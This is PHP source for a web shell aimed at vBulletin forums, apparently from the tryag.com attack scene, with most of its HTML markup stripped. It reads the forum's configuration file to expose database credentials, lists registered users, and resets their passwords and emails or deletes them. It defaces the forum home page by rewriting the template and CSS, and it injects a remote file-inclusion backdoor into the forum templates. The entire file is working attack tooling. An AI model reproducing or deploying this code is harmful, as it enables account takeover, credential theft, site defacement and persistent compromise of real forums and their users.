$act = $_GET['act']; if($act=='reconfig' && isset($_POST['path'])) { $path = $_POST['path']; include $path; ?>
::::Read Config Data:::: echo '' . $path . ''; ?>
Host : echo '' . $config['MasterServer']['servername'] . ''; ?>
User : echo '' . $config['MasterServer']['username'] . ''; ?>
Pass : $passsql = $config['MasterServer']['password']; if ($passsql == '') { $result = 'No Password'; } else { $result = '' . $passsql . ''; } echo $result; ?>
Name : echo '' . $config['Database']['dbname'] . ''; ?>
} if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="del" && isset($_POST['vbuser']) ) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$query = 'delete * from user where username="' . $vbuser . '";'; $r = mysql_query($query); if ($r) { echo 'User : ' . $vbuser . ' was deleted'; } else { echo 'User : ' . $vbuser . ' could not be deleted'; } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="shell" && isset($_POST['var'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $var = $_POST['var']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$Wdt = 'UPDATE `template` SET `template` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \'WHERE `title` =\'FORUMHOME\';'; $Wdt2= 'UPDATE `style` SET `css` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $result=mysql_query($Wdt); if ($result) {echo "

Done Exploit.


Use this :
index.php?" . $var . "=shell.txt";}else{ echo "

Error

";} $result1=mysql_query($Wdt2); if ($result1) { echo "

Done Create File


Use this :
index.php?" . $var . "=shell.txt";} else{ echo "

Error

";} } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="code" && isset($_POST['code'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $index = $_POST['code']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$index = $_POST['b']; $Wdt = 'UPDATE `template` SET `template` = \' ' . $index . ' \'WHERE `title` =\'FORUMHOME\';'; $Wdt2= 'UPDATE `style` SET `css` = \' ' . $index . ' \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $result=mysql_query($Wdt); if ($result) {echo "

Index was Changed Succefully

";}else{ echo "

Failed to change index

";} $result1=mysql_query($Wdt2); if ($result1) {echo "

Done Create File

";} else{ echo "

Error

";} } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="inc" && isset($_POST['link'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vblink = $_POST['link']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$hack15 = 'UPDATE `template` SET `template` = \'$spacer_open {${include(\'\'' . $vblink . '\'\')}}{${exit()}}& $_phpinclude_output\'WHERE `title` =\'FORUMHOME\';'; $hack= 'UPDATE `style` SET `css` = \'$spacer_open {${include(\'\'' . $vblink .'\'\')}}{${exit()}}& $_phpinclude_output\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;'; $result=mysql_query($hack15) or die(mysql_error()); $result=mysql_query($hack) or die(mysql_error()); } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="mail" && isset($_POST['vbuser']) && isset($_POST['vbmail'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; $vbmail = $_POST['vbmail']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$query = 'update user set email="' . $vbmail . '" where username="' . $vbuser . '";'; $re = mysql_query($query); if ($re) { echo 'The E-MAIL of the user ' . $vbuser . ' was changed to ' . $vbmail . '
Back to Shell
'; } else { echo 'Failed to change E-MAIL'; } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset($_POST['vbuser']) && isset($_POST['vbpass'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $vbuser = $_POST['vbuser']; $vbpass = $_POST['vbpass']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$query = 'select * from user where username="' . $vbuser . '";'; $result = mysql_query($query); while ($row = mysql_fetch_array($result)) { $salt = $row['salt']; $x = md5($vbpass); $x =$x . $salt; $pass_salt = md5($x); $query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";'; $re = mysql_query($query); if ($re) { echo 'The pass of the user ' . $vbuser . ' was changed to ' . $vbpass . '
Back to Shell
'; } else { echo 'Failed to change PassWord'; } } } if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login") { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
:::::Change User Password:::::
User :
Pass :
echo''; ?>

:::::Change User E-MAIL:::::
User :
MAIL :
echo''; ?>

:::::Delete a user:::::
User :
echo''; ?>

:::::Change Index by Inclusion(Not PL(Al-Massya)):::::
Index Link :
echo''; ?>

:::::Change Index by Code(All Edition):::::
Index Code :
echo''; ?>

:::::Inject FileInclusion Exploit(NOT PL(AL-MASSYA)):::::
Variable :
echo''; ?>
} if ($act == ''){ ?>
:::::DATABASE CONFIG:::::
Host :
User :
Pass :
Name :
} if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db'])) { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); mysql_select_db($db) or die('Nope,No cOnnection with DB'); if ($pass == '') { $npass = 'NULL'; } else { $npass = $pass; } echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; ?>
$re = mysql_query('select * from user'); echo''; while ($row = mysql_fetch_array($re)) { echo''; } echo'
IDUSERNAMEEMAIL
' . $row['userid'] . '' . $row['username'] . '' . $row['email'] . '
'; ?>
$count = mysql_num_rows($re); echo 'Number of users registered is : [ ' . $count . ' ]'; ?>
} if ($act == 'users'){ ?>
:::::DATABASE CONFIG:::::
Host :
User :
Pass :
Name :
} if ($act=='config') { ?>
:::::CONFIG PATH:::::
PATH :
} if ($act=='index') { // Index Editor ?>
Center ||| Left ||| right ||| Bold ||| UnderLine ||| Italic ||| NewLine ||| Colour ||| Marquee ||| Picture ||| Link

Copy The Code after Finishing your index
} ?>
Main ShellList UsersIndex MakerReadConfig

www.tryag.com

Sitemap